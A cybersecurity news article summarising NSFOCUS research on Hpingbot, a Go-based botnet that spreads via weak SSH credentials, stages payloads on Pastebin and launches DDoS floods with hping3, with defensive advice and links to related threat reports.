Hpingbot: New Go-Based Botnet Leverages Pastebin & Hping3 for Stealthy Attacks

NSFOCUS Fuying Lab uncovered a rapidly evolving botnet family named Hpingbot. Written in Go and targeting both Windows and Linux/IoT environments, Hpingbot showcases cross-platform efficiency, modular design, and stealth-focused tactics—all characteristics that indicate the presence of a highly capable development team behind it.

“This is a new botnet family built from scratch, showing strong innovation capabilities and efficiency in using existing resources,” states the NSFOCUS report.

Rather than relying on complex infrastructure, Hpingbot smartly leverages public platforms and tools. It uses Pastebin—a public text-sharing site—as a payload distribution hub and the hping3 network testing tool to carry out DDoS attacks.

“The use of Pastebin and hping3 not only improves stealth but also significantly reduces development and operating costs,” the researchers note.

Interestingly, the Windows version of Hpingbot cannot use hping3, yet remains highly active. This leads analysts to believe its primary utility lies in downloading and executing arbitrary payloads, potentially acting as a distribution vector for more dangerous malware.

Despite being capable of DDoS attacks, Hpingbot remains largely dormant in that respect. Since June 17, only a few hundred attacks have been recorded, mainly targeting Germany, the US, and Turkey. The botnet instead appears focused on silently establishing persistence and preparing infrastructure for future malware distribution.

“The frequency of DDoS attacks launched by hpingbot is low, and most of the time it is silent, which also shows that DDoS is not its only purpose,” NSFOCUS emphasizes.

The report draws attention to a curious case: IP address 79.*.*.212, running the NetData monitoring service on port 19999, was attacked over 15,000 times by six different botnet families, including Hpingbot.

“The new botnet may use this method to test the DDoS attack capabilities of its newly developed DDoS module in actual attack activities.”

Hpingbot employs a split propagation strategy, keeping its SSH brute-force module separate from the core sample. This helps protect its propagation techniques and restrict spread to specific targets. Its primary infection method is weak SSH credentials.

Once installed, it maintains persistence via Systemd, SysVinit, and Cron scripts, while performing command history clearing and file self-deletion to avoid detection.

For systems that support hping3, Hpingbot offers a dozen DDoS attack modes via plaintext commands such as:

• syn (SYN Flood)
• ack, psh, fin-ack (TCP ACK/PSH/FIN Floods)
• udp (UDP Flood)
• botox, fsrpau (Mixed Mode Floods)

Each attack command is executed with hping3 using specified parameters (IP, port, duration, etc.), allowing custom packet floods tailored to each target.

One of the most concerning characteristics of Hpingbot is its breakneck development pace:

• Over 10 script iterations in two weeks.
• Frequent updates to Pastebin links and payloads.
• Switching C2 servers at least three times, showing strong anti-detection awareness.
• Enhanced support for apt, yum, and pacman for better environment compatibility.

“The attackers are continuously optimizing the content they put on the Pastebin platform and the corresponding download and installation scripts… showing the potential intention of operating this malware family for a long time.”

While still in its early stages, Hpingbot is not to be underestimated. Its architecture, modularity, and aggressive update cycles point to a botnet built for longevity and adaptability, potentially serving as a staging platform for ransomware, APT components, or data theft tools.

“There is a risk of distributing more dangerous payloads… Its rapid rate of improvement suggests that there may be a professional development team behind it.”

Security teams are advised to monitor SSH traffic for brute-force attempts, restrict access, and track known Pastebin and hping3 usage patterns.

Related Posts:

• APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools
• cShell DDoS Bot Exploits Poorly Managed Linux SSH Servers
• New APT Group ‘Actor240524’ Targets Azerbaijan and Israel with Advanced Tactics
• XorBot Botnet Resurfaces with Advanced Evasion and Exploits, Threatens IoT Devices

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy